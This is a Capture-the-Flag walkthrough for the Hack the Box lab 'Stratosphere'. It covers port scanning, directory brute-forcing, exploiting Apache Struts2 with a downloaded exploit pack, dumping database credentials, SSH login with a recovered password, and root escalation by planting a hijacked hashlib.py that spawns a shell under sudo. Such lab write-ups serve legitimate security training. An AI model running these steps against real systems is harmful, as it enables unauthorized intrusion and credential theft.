Hello friends!! Today we
are going to solve another CTF challenge “Stratosphere” which is lab presented
by Hack the Box and is available online for those who want to increase their
skill in penetration testing and black box testing. Stratosphereis retired
vulnerable lab presented by Hack the Box for making online penetration practices
according to your experience level; they have the collection of vulnerable labs
as challenges, from beginners to Expert level.
Level: Easy
Task: find
user.txt and root.txt file in victim’s machine.
WalkThrough
Since these labs are
online available therefore they have static IP. The IP of Stratosphereis
10.10.10.64
Let’s start off with
scanning the network to find our target.
nmap -sV 10.10.10.64
As per nmap port 80 is open for HTTP let’s explore the
target IP in the browser. After exploring port 80, we was welcomed by following
page where we didn’t found any informative clue.
After then we visit Port 8080 for HTTP proxy and here also
we get same web page. We try to inspect source code of port 80 and 8080 but we
got nothings.
Therefore next we decided to have directory brute force
attack with help of Dirbuster and used wordlist
“dictionary-list-2.3-medium.txt” for the attack.
Luckily it fetched some web directories such as /Monitoring,
let’s explore it in the web browser.
So when we try to open the URL http://10.10.10.64:8080/Monitoring
then it gets redirect to http://10.10.10.64:8080/Monitoring/example/Welcome.action
for login. I closely look at the URL containing .action extension, so I made Google search to extract complete
information related to this extension. I found action extension is utilized by apache struts2 which has a history of
bugs and vulnerabilities and if you will search for its exploit, you will get
lot of python scripts and exploits to compromise this service.
So we used nmap script to identify its state of
vulnerability
nmap -p8080 --script
http-vuln-cve2017-563 --script-args path=/Monitoring/ 10.10.10.64
Awesome!!! It is vulnerable to cve2017-563, let’s exploit
it.
I found an exploit Struts-Apache-ExploitPack , lets download
it from git hub and give full permission.
cd git clone
https://github.com/drigg3r/Struts-Apache-ExploitPack.git
cd
Struts-Apache-ExploitPack
cd Exploiter
ls
chmod 777
Exploit.sh
Now run the following command to exploit the victim machine.
./Exploit.sh
http://10.10.10.64:8080/Monitoring/example/Welcome.action
id
ls
cat db_connect
Username: admin
Password:
admin
So now we have database credential, let’s utilized them for
getting all information from inside the database.
mysqldump -u admin
-padmin --all-databases --skip-lock-tables
Here I found Password “9tc*rhKuG5TyXvUJOrE^5CK7k” for user
Richard, now let’s try to connect with SSH using these credential.
ssh
richard@10.10.10.64
Yuppie we successfully logged in victim’s machine, so now
let get the user.txt and root.txt
ls
cat user.txt
cat test.py
Here we notice that test.py was computing some hash values and
at the end it will give success.py from inside the root directory and whole
script is depends upon hashlib.
Then we also check sudo rights for Richard and found he has
sudo right to run all type of python script. So very first we check test.py
file and start solving hashes in order to get success.py
sudo /usr/bin/python
/home/richard/test.py
So we got the hash value, now we need to decode it and after
decoding I found “kayboo!”
On submitting the decoded text,
it generated a new hash for further step and again I decode it and submit the
answer and after then again a new hash and it was processing repetitively same
at each time on submitting decoded text.
Since test.py was importing
hashlib which was a python library so I last option was python library
hijacking to escalate the root privilege.
Therefore I create a hashlib.py script in the current directory
to import system binary ‘/bin/bash’ and hence now when we will run test.py then
it will import hashlib.py which will calls /bin/bash binary file.
echo 'import
os;os.system("/bin/bash")' > hashlib.py
sudo /usr/bin/python
/home/richard/test.py
Booom!!! Here we owned root access, now let’s get the
root.txt file and finish this task.
0 comments:
Post a Comment